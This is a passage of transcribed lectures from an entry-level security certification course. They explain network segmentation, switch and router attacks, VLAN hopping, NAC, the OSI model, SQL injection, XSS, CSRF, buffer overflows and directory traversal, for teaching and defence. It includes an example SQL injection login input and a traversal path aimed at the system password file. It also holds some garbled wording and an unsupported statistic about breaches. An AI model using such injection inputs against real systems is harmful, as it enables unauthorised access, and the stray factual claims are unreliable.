has to be routed before it can enter or exit a subnet.And therefore, if somebody breaks into say,the secretary's computer, they're going to be trapped in that subnet, unless they have permission to go into some of the other more secured subnets that we have out there.Each time it goes through a router again,it's going to be checked by the access control list, and that secretary's laptop may not have access to the database server, for example,which has more confidential and secured information.So they're going to be limited in what they can do once they've broken in.

Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 54 today we are discussing about Switches can also provide the ability to create virtual local area networks.This adds a layer of separation to our networks without requiring us to buy additional switches that have to be configured and installed on the network.VLANs are implemented to segment our network,reduce collisions, organize our networks,boost performance and increase security.Unfortunately attackers have created VLAN hopping which allows them to break out of our VLANs and access other VLAN data though.There's a couple of mechanisms to do this. The first method is known as switch spoofing. In this attack, an attacker essentially configures their device to pretend that it's a switch and they connect to a switch port to negotiate a trunk link and break out of the VLAN. To prevent this, you can disable dynamic trunking protocol or DTP on all your switch ports,place all your unplugged ports into an unused VLAN,explicitly forward frames and avoid default VLAN names.The second method is what's known as double tagging.As traffic goes across a switch,it reads the outermost VLAN tag first,strips it off and then routes the trafficto the proper VLAN.In double tagging though,an attacker actually adds two VLAN tags,an outer tag and an inner tag,so as traffic goes through the first switch,it removes the outer tag and is then forwarded to the destination of the inner tag.You can prevent this by moving all the ports out of the default VLAN group.Double tagging can also be prevented by upgrading your switch's firmware,utilizing an unused VLAN as the default VLAN and redesigning the VLAN structures.

Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 53 today we are discussing about Network Access Control Network Access Control or NAC is used to protect your network from both known and unknown devices.With NAC, a device is scanned to determine its current state of security prior to it being allowed access to your network.Now, NAC can be used for computers that are within your internal network that are physically located in your buildings and connected to it or it can be applied to devices that are connected into your network remotely through a VPN.When a device attempts to connect to the network,it's placed into a virtual holding area while it's being scanned.Now, the device here can be checked for a number of different factors,including its antivirus definitions to make sure they're up to date,the status of its security patching,and other items that might introduce security threats into the network if you allowed it to connect.Now, if a device passes this examination,it's allowed to enter and receive access to all of the organizational resources that are provided by your network.If the device fails the inspection, though,it's instead placed into a digital quarantine area.And it awaits remediation. While it's in this area, the device can receive its antivirus updates,it can get its operating system patches,and any other security configurations and services it needs. But it can't logically communicate with other portions of the network.That's why it's been placed in quarantine.Like a bad child, the device has been placed in time out until it can be rehabilitated and meet the requirements of the initial NAC examination.Once it successfully meets those requirements,it's then moved into the network and receives full access, again,to your organizational resources.Now, NAC's solutions can be run either using Persistent or Non-Persistent Agents.Persistent Agents are a piece of software that's installed on a device that's requesting access to the network.This works well in a corporate environment because the organization owns all the devices and controls their software baselines,but it doesn't work really well if you're using an environment where people bring their own devices.Instead, you might want to use a Non-Persistent Agent for this.A Non-Persistent Agent solution was developed and is very popular in college campuses where people bring their own devices in.These solutions require the users to connect to the network, usually over wifi,and then they go to a web-based portal for log in,and they have to click a link.When they click that link, the link then downloads an Agent onto their computer, scans the device for compliance,and deletes itself from the user machine once it's done.Network Access Control can be offered as a hardware or a software solution.One of the most commonly used Network Access Control mechanisms is called the IEEE Standard 802.1x and it's used in port-based Network Access Control.Now, most NAC is actually built on top of this 802.1x standard.We're going to discuss the 802.1x standard in more detail in a future lesson, though.

hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 52 today we are discussing about Network Zones When considering the architecture of your internal network,it's important to consider breaking your network up into multiple security zones.These can be further broken up into sub-zones through the use of subnetting,ACLs, firewall rules,and other isolation methods that will help us prevent or shape the flow of data between thedifferent portions of our network.Most networks are segmented into at least three different zones:the LAN, the WAN, and the DMZ.LANs can be secured using private IPs,using anti-malware programs,and by placing your clients behind a router and its associated ACLs.WAN connections, on the other hand,should be monitored and firewalled to secure your networks against the threats of those contained.The Internet is the world's largest WAN.And traffic crossing across the Internet should be tunneled through a virtual private network when you want to keep it safe from prying eyes.This will increase your confidentiality.In fact, the TLS tunnels that are used inHTTPS connections are a type of VPN.So any time you're going to a website and you see that secure lock,there's actually a VPN being used between your web browser and the web server you're visiting.In addition to our LAN and our WAN,the most most common security zone that we use is what's known a DMZ, or a De-Militarized Zone.This zone is focused on providing controlled access to publicly-available servers that are hosted within your organizational network.For example, if you're self-hosting your web serverand email servers inside your organization,it's a best practice to place them within your DMZ,and this is a tightly controlled zone with proper access control rules.This allows you to maintain precise control of the traffic that's going to be allowed between the inside, your LAN; the outside, the WAN,and the DMZ portions of the network.To create a DMZ, multiple interfaces are used on your organization's firewall. You'll have a strict set of access control list rules that are going to be applied to those interfaces,and a public IP address is required for each server hosted within your DMZ.The purpose of creating security zones like a DMZ is to create this separation of critical assets.Not all devices in your network require the same level of protection.Some resources, such as file servers,are going to contain confidential information,like employee data, and this is going to require additional security being placed there.Instead of protecting every device to the same high level,we can create sub-zones inside of our networks based on the level of protection required.In addition to these internal sub-zones,there may be also be additional external zones that you need to create, such as an Extranet.Now, an Extranet is a specialized type of DMZ that's created for your partner organizations to access over a wide area network.It acts much like a DMZ, but it's not publicly accessible.This Extranet is also placed under additional network monitoring and scrutiny.For example, I access an Extranet every time I need to go to Excelous to order exam vouchers for my students in my ITIL and Prince2 courses.It's a part of their network that only their externalpartners, training partners like us,can have access to, and not the general public.Conversely, on the other side,we have what's known as an Intranet.An Intranet is something that allows you to expand your internal network within your organization across multiple areas.This is usually done using VPN tunnels.So for example here, I have a couple of employees who work on the other side of the world.If they need to get access to our file servers, they can do that by logging in to our Intranet and get access to it through that secure connection.

hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 51 today we are discussing about Routers, now while switches operate at layer two of the OSI model by making their decisions based on MAC addresses,routers operate at layer three, making their decisions based on IP addresses.Routers are used to connect two or more network to form an internetwork. Such as when you connect your small office home office router, your internal network,out to the internet.It connects your office's network out to other office's network over the internet.Now, routers are devices that make routing decisions and they do this by using IP addresses. These layer three IP addresses are used to determine what network a particular host is on and what path the traffic should take to go across the wide area network until it reaches its destination network.Once the traffic reaches the destination network or the final router that's involved, that particular router will conduct ARP broadcast to locate the correct host on its local network and pass the traffic to it using its MAC address at the layer two which is known as that physical address.In addition to this important routing function,routers also provide us with some security functions too, access control lists or ACLs can be configured on the router's interface to control the flow of traffic into or out of a certain part of the network.ACLs are an ordered set of rules that will either permit or deny traffic based upon certain characteristics,like it's source or destination IP address,the source or destination port number associated with it and the application or service being run.Now in an effort to get past these access control lists,attackers will often conduct IP spoofing. If they can spoof the IP, they can trick the access control list to think they're on the approved list and let them in or let them out.Since routers are on the external interface for a network, they're commonly a target for attack as well. And so out of the box, routers tend to be very insecure and you need to configure them properly for security.This includes changing this like your default username and password, changing the default routing tables,and changing those default IP internal addresses.To help protect our routers and our internal networks,we use a lot of other network devices and technologies,such as firewalls, intrusion prevention systems,virtual private network connections, content filters,and access control lists.By layering all these defenses, we create a better defense in depth posture.Now, we're going to cover all of these protective devices and technologies throughout this course but for now, it's sufficient to realize that using these things helps add up our security.And that helps us to secure our routers from various attack methods.

hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 50 today we are discussing about Switches.Now hubs were originally used to connect devices on a network.All of the devices will be connected to a hub,and anytime something went into one port of the hub,it would then repeat that out all of the other ports.This was known as a broadcast message.Now this is because hubs were dumb.They had no intelligence.As networks got larger,hubs caused a lot of collisions and slowed down the network.To solve this problem,something came along called a bridge,and this was used to separate physical LANs or WANs into two logical networks,or connect two logical networks together.Now switches are the evolution of hubs and bridges.Essentially every single port on a switch acts as if it was a bridged hub on each one.This means that it improves the data transfer and security through the intelligent use of MAC addresses.Being able to figure out where a device is and only sending the information out that particular port of the switch and ignoring the rest.This reduces traffic and increases security.Now switches are subject to three main types of attack though.They are subject to MAC flooding, MAC spoofing,and physical tampering.This is because they're trying to overcome that logic and intelligence that the switch has.MAC flooding is an attempt to overwhelm the limited switch memory that's set aside to store the MAC addresses for each port,and this is known as the content addressable memory,or CAM table.Now if a switch is flooded, it can fail-open and begin to start acting like a hub and broadcasting data out every single port.This is a problem that can start causing confidentiality to be breached inside your local network.Now MAC spoofing, on the other hand,occurs when an attacker masks their own MAC address to pretend that they are having the MAC address of some other machine on the network.For example, wireless access points may use MAC filtering to prevent devices that are unknown from joining the wireless network.They do this my looking at their MAC address that's being reported,and if it's not inside their access control list,they'll block it from connecting.Now if I switch my MAC address to a known or allowed device,I can gain access to that network though by spoofing.I pretend that I am an authorized device using a known good MAC address,and I pass right through that ACL.MAC spoofing is also sometimes combined with ARP spoofing.ARP is an address resolution protocol,and it relies on the MAC addresses as a way of combining what MAC address goes to which IP,and which IP goes to which MAC address.So they often combine a MAC address spoof with an ARP spoof as an attempt to be able to have the attacker appear that they are the destination that somebody is trying to send information to,and use that as a way to steal that information.Now to prevent this,you have to configure your switch to accept limited numbers of static MAC addresses,limit the duration of time that an ARP entry is allowed on a host,and conduct ARP inspections.To keep track of what ARP is being used with which MAC address and which IPs.The third type of way to overwhelm a switch is to use physical tampering.Physical tampering occurs when an attacker attempts to gain physical access to the switch,because if you can touch a device,you can pretty much configure it to do whatever you want.Now to prevent physical tampering,the switch should be locked up in a network rack, or a network closet,or behind closed doors so that, that room is secure using good physical security practices.

hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 49 today we are discussing about The OSI Model.The Open Systems Interconnection,or OSI Model is used to explain how network communications occur between a host and a remote device over a local area network or a LAN.Now the OSI Model is very useful to help use categorize different communication protocols that are used in networks,and gives us a common lexicon that we can use to use to describe the functions of different devices.you probably remember the pneumonic of Please Do Not Throw Sausage Pizza Away.This represents the seven layers of the OSI Model,going from the bottom to the top.This is: Physical, Data Link, Network, Transport,Session, Presentation, and Application.The first layer is the physical Layer.This is the layer that represents the actual network cables and radio waves that are used to carry data over a network.Data carried over the network at the Physical Layer is known as bits.And they can be electrical signal or radio wave.Examples of some of the things that operate at the Layer One or Physical Layer,are the things like our network cables whether they're fiber optic,or copper, or coaxial.It could be radio waves like Wi-Fi and Bluetooth.It can be a hub or repeater,which are dumb devices that simply take inputs in and then repeat them out the other side.Our second layer is the Data Link Layer.This is the layer that describes how a connection is established, maintained and transferred over that physical layer.Addressing here is done using physical addresses.Like MAC addresses.Now, at this layer the bits are going to be grouped into frames and then sent over the network.Examples of some things that operate at Layer Two or the Data Link Layer, includes things like MAC addresses,switches and bridges.Now, bridges are an earlier device that have later on evolved into switches.Switches use MAC addresses as their form of physical addressing.This allows a switch to decide where to send that frame of information based on the MAC address it's designed to go to.And so, it's smarter than a hub because it will decide where that particular frame goes as opposed to just repeating it out every single port that it has.Now, as we move up the ladder we get to the third layer which is the Network Layer.This is the layer where logical addressing is actually performed.And this includes things like routing and switching information between hosts, the network and the internetworks.At this layer, the frames are now taken and grouped up into packets, so bits became frames, frames become packets.Now, examples of this include things like the addresses which are IP addresses.This allows us to tell where a piece of information,where a packet is going to be sent over our network.We also use things like Layer Three switches,which in addition to using MAC addresses to decide where things go,they can use the IP addresses at Layer Three.And of course routers which are by far the most common Layer Three device,because they're used to connect all of our networks together around the world.Our fourth layer is the Transport Layer.This layer manages and ensures transmission of the packets occur from the host to the destination it wants.This uses either a TCP, known as a Connection Full Protocol or UDP which is a Connection Less Protocol.You might remember from Network+,TCP has that three way handshake,and it says, hey I'm ready to send you something,okay I'm ready to be sent something.All right, let's start sending it.And then they send the information.

hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 48 today we are discussing about In this episode, we're going to talk about some of the different devices that make up our networks and some of the different attacks that are used against them.But before we do that, we're going to cover quickly the basics of the networks by going through the OSI model.Now in this section of the course,we're going to do this as a quick review because you should have already learned the OSI model and the basics of networking or not, the information contained in that curriculum is really important to understand so you can better understand the security that we're talking about throughout this week.

hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 47 today we are discussing about SQL Injection.What is SQL?SQL, or Sequel, stands for the structured query language.And it's the way that a web application communicates to a database server to ask for information.Because this is the language used to communicate with the databases and  the databases hold lotsof valuable information,this has become a popular target for attacks.This brings us to the concept of an SQL Injection,which is an attack consisting of the insertion or injection of an SQL query via input data form that the client sends to the web application.SQL injections are just a specific typeof code injection though.A generalized injection attack is the insertion of additional information or code through data input from a client to an application.This code injection can occur using any type of code though.But the most common are SQL, HTML,XML, and LDAP injections.By far though, SQL injections are by far the most common.And so we're going to talk about that in this lesson as we go through.Just as SQL injections are used to insert SQL statements into a web application, these other types of code injection can also be used as an attack method, too.And so keep that in mind.Now before we start to discuss how an SQL injection works,it's important to know how a normal SQL query or request is performed.Let's pretend that you wanted to log into this website.First, you have to enter your username.So, I'm going to enter jason as mine and then you have to enter your password.So I'm going to enter my oh so super secure password of pass123 for this example.With both of those entered in, I go and click on the Login button,and the website will send my username and password to the database to verify if the username matches the password stored in the database.This is done by sending a SQL or structured query that says select any records from the user table in the database where the user_id = 'jason',and the password = 'pass123'.So, if the query finds a record in the table that has both the username of jason and the password of pass123,it's going to return the value of true to the web application.And the web application can perform whatever the next action it's supposed to do in.In this case, it logs me into the website and displays whatever the authenticated user homepage is.Now, if the username and password combination weren't foundin that database table called users,then it's going to return false,and the web application would give me some kindof a message saying please enter your password again.This is how it's supposed to work.But how does it work with an SQL injection?Let's try logging into this website again.But this time, I'm going to perform an SQL injection.So, we go back to the Login page,and I'm going to enter the username of jason once more.Then instead of entering my password,I'm going to enter the Escape character,which is a backward single quote mark,and the statement, `OR 1=1;.Now, this isn't my password, obviously.But instead, this is some code that I'm trying to inject into the SQL statement that the web application is going to send to the database when I click Login.So, let's click the Login button,and you can now see the full SQL statement that the web application has generated and sent to the database.Select any records from the user table in the database where the user_id = 'jason'.So far this is the same as our earlier legitimate login attempt. And where the password = '` OR 1=1 ;'.What is happening here?Well, this is showing us that the statement is now being sent to the database,but when it reaches that Escape character,that backward single quote,it's going to treat every thing after it as a command to process.

hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 46 today we are discussing about The next two exploits we're going to discuss are types of web application vulnerabilities.These are known as cross-site scripting and cross site request forgery. Cross-site scripting occurs when an attacker embeds malicious scripting commands into a trusted website.When this occurs the attacker's trying to gain elevated privileges, steal information from the victims cookies or gain other information stored by the victims web browser.During a cross-site scripting attack,the victim is the user, not the web server.The web server's already been compromised possibly.A cross-site scripting attack exploits the trust that exists between a user's web browser,and the web server that they're visiting.This often happens because the attacker's able to insert some malicious code into a web page that's being delivered from the server to the victim or client.There are three types ofcross-site scripting attacks:stored and persistent, reflected, and DOM-based attacks.A stored and persistent cross-site scripting attack attempts to get data  provide by the attackerto be saved on to the web server by the victim.Now in a reflected cross-site scripting attack, the attempt here is to have a non-persistent effect which is activated by the victim clicking on a link on that site.In a DOM-based attack, this is going to attempt to exploit the victim's web browser itself and it's often called a clientside cross-site scripting attack.This comes from the fact that the user's document object model or DOM is vulnerable to the attack.The DOM is part of the user's web browser.To prevent cross-site scripting attacks,programmers should use output encoding of their web applications, to prevent codes from being injected into them during delivery and they should also use proper input validation to prevent the ability for HTML tags to be inserted by users when they're entering information on a web form. As a user, you can help protect yourself from cross-site scripting attacks by increasing the security settings from your cookie storage and disabling scripting language when you're browsing the web.Just like we talked about back in the webbrowser configuration lesson of application security. Whereas cross-site scripting focuses on exploiting the trust between a user's web browser and a website. Cross-site request forgery instead exploits the trust that a website has in a user.In a cross-site request forgery,the attacker forces the user to execute actions on a web server that they already have been authenticated to.For example, let's say that you've already logged into your banks website and provided your username and your password.At this point you're already authenticated and the website trusts you.If an attacker can send a command to the web server through your authenticating session,they are forging the request to make it look like it came from you.The attacker in this case will be unable to see the web server's response to his request or commands but he could still use this to transport funds from the victim, change their password or do a myriad of other requests on the victims behalf. To prevent cross-site request forgery from being successful, programers should require specialized tokens on web pages that contain forms.Such as captions, utilize special authentication and encryption techniques, scan any XML file submitted by a user, and requiring cookies to be submitted twice for verification to ensure they both match and have the proper integrity.

hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 45 today we are discussing about The next type of exploit that were going to cover is called a buffer overflow.A buffer overflow occurs when a process in a program stores data outside the memory range allocated by the developer.Now, this begs the question, what exactly is a buffer?Well, a buffer is simply a temporary storage area that a program uses to store its data. Let's pretend that you have a glass sitting on a table.It can hold a certain amount of water, right?If it's designed to hold 16 ounces of liquid,but you pour 20 ounces in, well, the cup is going to overflow with water and the table is going to get wet.In this example, the glass is our buffer,and when we overflow it with our data, in our case water,the extra is going to spill out onto the table and make a huge mess.Buffer overflows in the IT world can also create a big mess for us.In fact, 85% of the data breaches were caused by a buffer overflow attack being used as the initial attack vector.So, let's take closer look at how a buffer overflow attack really works.Let's pretend you wanted to store my phone number into your contacts list.Here in the United States, our phone numbers consistof 10 digits.The first three digits are for our area code,which represents the city we live in.And the last seven digits represent the person's unique phone number.Before we had cell phones,you would simply pick up the phone and dial seven digits of your phone number because the telephone company assumed you wanted to place a local call within your own city or area code.So, let's pretend that the person who designed the contact list application on your phone decided they wanted to save some memory space and they wanted to use the smallest buffer possible,so they decided to use an eight-digit buffer because they are going to assume that you don't need to store an area code because you're going to make local calls.So, let's store my made-up phone number, 555-1234,into an eight-digit buffer called A.When I do this, you'll see that it takes up the first seven boxes labeled zero through six,because computers always start counting with zero,like you learned back in binary classes at happens, though, if we try to enter a number that's too long?Well, Buffer A isn't the only memory buffer that your contact list application can use.Right after Buffer A is Buffer B and then Buffer C and so on.So, let's consider how we store a longer phone number.For example, let's say you're out on vacation and you meet somebody but they don't live in your city.Well in this case, you need to store the area code and the phone number, like 410-555-1234.Since this now includes the area code for Annapolis, Maryland, we now have ten digits we need to store, but each buffer is only eight digits long because our programmer didn't quite think though all of the different types of phone numbers that one might need to store in their list.So, our contact list  application tries to storethis ten-digit number in an eight-digit buffer.But the last two digits overflow Buffer A and go into Buffer B.This is exactly what happens with a buffer overflow.Now, why is this a bad thing? Well, to explain that, we have to get a little bit technical, so bear with me. Each program reserves a chunk of system memory when it's run.This allows it to have a place to store data that it needs during processing.

hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 44 today we are discussing about Software vulnerabilities and exploits. Now that we've covered how software should be securely coded,let's cover a few of the exploits that are used against improperly coded programs.First, we have backdoors. Backdoors consist of software code that's been placed in a computer programs to bypass on normal authentication and other securing mechanisms. These are often created by developers themselves in order to make it easier for them to update custom programs in the future. But, this is a horrible practice in terms of security.All secure coding and program methodologies consider backdoors a poor coding practice and they state that it should never be utilized by programmers.Because of this, most developers have phased out the use of backdoors. But some backdoors can be created in our systems by attackers, too.For example, if a system is infected with a remote access Trojan,this is also considered a backdoor into that system.The next type of exploit that we hav is what's called a directory traversal,which is going to exploit insecurely coded web applications and servers.A directory traversal is a method of accessing unauthorized directories by moving through the directory structure on a remote server.Let's pretend, for example, that my website Diontraining.com was poorly coded and was subject to this type of an exploit. Of course, we've gone ahead and secured our website against this type of vulnerability, so this is just going to be a theoretical discussion to explain the context of a directory traversal. Normally, you could access our website by going to www.kicktraveller.weebly.com Or, you might access it by going to a dynamic sub-page like diontraining.com/menus,or something like that.If you wanted to attempt a directory traversal,you're going to have to add something to the directory path that has an input variable inside the URL.Something like menu=../../../../etc/password.This attempts to move up four levels through the directory structure from the web server's public folder into it's root folder and then back down into the etc folder and then attempts to access the password file.If this was successful, the text based password file would be displayed inside your web browser.anytime you see that there's a series of ../ in them,you know that this is most likely a directory traversal and it's being used as part of an exploit.Often, a directory traversal is used as a way to access a file on a web server and sometimes you can even use it to conduct an arbitrary code execution on that server.Arbitrary code execution occurs when an attackeris able to execute or run commands on a victim computer. This might occur if someonewalks by your desk at work,sees you're logged into the computer,but you're away from your desk.They start running a program on your computer.This would be classified as an arbitrary code execution.This is pretty bad for security, as you can imagine.But, what's even worst, is a specialized type of arbitrary code execution called an RCE or remote code execution.A remote code execution occurs when the attacker is able to execute or run commands on a remote computer.Notice the key difference here between an arbitrary and a remote code execution.With a remote code execution,the attacker can run the commands remotely;such as through an interactive shell session or some other kind of attack.

hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 43 today we are discussing about In this lesson we're going to focus on the different testing methods that you may use to help your organization's developers secure their code.Most security analysts are not programmers themself,so the Security+ exam isn't focused on the specific types of code reviews like pair programming, over the shoulder reviews,and others.Instead the episode focuses on just a handful of testing methods that an entry level security analyst might conduct.The first type of testing is known as system testing.This comes in three varieties:black-box testing, white-box testing, and gray-box testing.Black-box testing occurs when a tester is not given any information about the system or program before beginning their test.For example, if I create a program and I wanted you to conduct this type of a test,I might simply hand you a copy of the executable program on a disk and then it's up to you to figure out how it functions, how to bypass any security I may have coded into it,and if you can crash it by entering in incorrect information.Essentially you're going to be getting your testing without any sense of what the program does or how it functions.As a tester, you're essentially blind to start with and you discover your way around the program or system through your testing.White-box testing on the other hand is the exact opposite.In white-box testing, the tester is given the details of the inner workings of the program or system.This may even include access to the full source code of that program, diagrams of the system,user access credentials, logons, and more.The third type of testing is called gray-box testing.This is a mixture of black-box and white-box where the tester is given some amount of information about the system and conducts his testing as if he doesn't have full access to it.For example, a gray-box tester might be given user level credentials to test a system,but not given administrative credentials.If you're testing a network system,you may be given some information like the IP address of different devices,but you're not given the version of the software that's running on each device.As a part of these system tests,you're often attempting to break the system by attempting to stress that system or create an exception.It's important that programmers have coded their applications to fail securely,and to ensure this happens you're going to purposely create error conditions to cause an error to occur and see how the system is going to react to it.If the program is running when the error occurs, the error is known as a runtime error.If the program fails to run because of a coding error,this is known as a syntax error.This is because the most common cause of this type of error in programming is when a programmer doesn't put the proper syntax expected by that programming language,such as leaving out a closing parenthese or missing a semicolon inside their code.As a security analyst, you're much more likely to experience a runtime error than a syntax error you're testing these things on a live environment.Now,when you create an error, this is also known as an exception,you need to be able to have a way to handle this properly and gather the details of the error and what caused it.

hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 43 today we are discussing about As we move through the seven phases of the software development lifecycle,it's important for not to forget the fundamentals of good security.Our developers should always remember the three tenets of the CIA triad:confidentiality, integrity, and availability.Remember, confidentiality ensures that only authorized users can access the data being processed by an application.The most common of ensuring confidentiality is to include the use of encryption to maintain the secrecy of the data being stored.Integrity is focused on ensuring the data is not modified or altered without permission. The two main ways that we do this as developers is by utilizing hash algorithms as a method of integrity check for the data or by using journaling and logging functions to create audit trail showing the integrity of the data has not been comprised.When developers are attempting to ensure availability,they're focused on ensuring that the data is available to authorized users when it's needed.The most common way of doing this is by creating redundancy in the overall system design,by ensuring their software code is error-free,or by ensuring that their software can conduct error handling appropriately to prevent crashes.During the testing phase, it's important to conduct an in-depth code review to ensure that there are no vulnerabilities that might affect the confidentiality, integrity,or availability of the software or the integrated system.These code reviews are generally performed by programmers, not by security analysts though.On the other hand, security analysts do help during the software development lifecycle by conducting threat modeling.Threat modeling helps to prioritize vulnerability identification and patching throughout the SDLC.By helping to prioritize the threats,the security analysts can help with the identification of applications or systems that should receive additional protections,which threats are more likely to affect them,and which ones have known vulnerabilities that exist.Based on this, additional effort and funding can be applied in the most efficient way to fix the issues before an attack happens or an attacker can exploit them.After all, there are a lot of threats out there and a lot of ways to attack a system if you want to breach an area of the CIA triad.To best protect applications, we should ensure that good security is programmed in from the beginning back during the requirements,analysis, and implementation phases.Numerous studies have proven that it's much cheaper to utilize secure coding practices and to conduct more thorough testing before releasing a product than to try to fix insecure code after releasing the product,as well as trying to clean up from the mess of an attack.What secure coding practices should our programmers use during development?First, we should ensure that we design our applications with the concept of least privilege.Least privilege means that user or processes should be run using the least amount of access necessary to perform the given function.Does your application require administrative permissions to run?If so, why?Developers should always try to use the lowest permission level when they're performing a function.So whenever it's possible, the program should be run as a user level person instead of an administrator or root level one.

hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 42 today we are discussing about In this section of the course,we're going to talk about software development.When a piece of software is created, it requires a lot of work.Each and every function that's performed by that software has to be written to be able to do its intended role.This often requires the work of dozens of programmers and hundreds of thousands of lines of code.Often, when a bug is found in a piece of software,I hear people ask why that company didn't figure it out before the software was released.Well, there's lots of different ways to conduct software testing,and we're going to talk about them later on in the section.But bugs are still going to find their way into code because our software is so complex these days.Let's take, for example, the Windows 10 operating system.It consists of over 50 million lines of code and took the involvement of hundreds of different programmers.With that much complexity, there's always a chance that an error is going to be introduced into the code base.Now, to try and counteract the complexity of our software development,many models and methods have been introduced,the most common of which is known as the software development life cycle or SLDC.The software development life cycle is an organized process of developing a secure software application throughout its life cycle throughout the project.This process covers everything from the initial idea of the software,through its coding and testing,and even into its deployment and retirement.The software development life cycle is based on a generic Waterfall model of development.Each phase of a life cycle is broken down into smaller portions.As each one is finished, the next one has begun.The reason this model is termed the Waterfall is that information and the software product itself flows from the top stage all the way down to the bottom stage,getting more developed as it progresses downward.Visually, this looks like a waterfall,as shown in this example on the screen.Different organizations use different phases or stages as part of their software development life cycle though,you need to know the seven phases.Now, let's cover each of theses seven phases.The first phase is planning and analysis.During this stage, the goals of the software project are determined, the stakeholder needs are assessed,and all of the high level planning work is conducted.Essentially, this is where things go from a rough idea that someone had for a piece of software into a bit more formalized and well developed concept that we can plan the rest of our development cycle against.Once all the requirements have been gathered,we can move into the phase that's known as software or systems design.It's during this stage that the application or system is defined, outlined, and diagrammed in detail.Essentially, this is where we focus on the overarching inputs and outputs of each function that are going to make up the final software that's going to be released to our customer.At this point, we still haven't created any programming code though.This brings us to the third phase,which is called implementation.During implementation, programmers will begin to code all of the various functions that are needed for the final product.As each piece of the code is developed,the programmers will conduct some basic debugging and testing to ensure that its functionality is working properly.But, at this point,there's been no formal testing completed yet.The fourth phase is reserved for that formalized testing of the application.It's during this phase that we get the code and we check it through a myriad of different testing methodologies.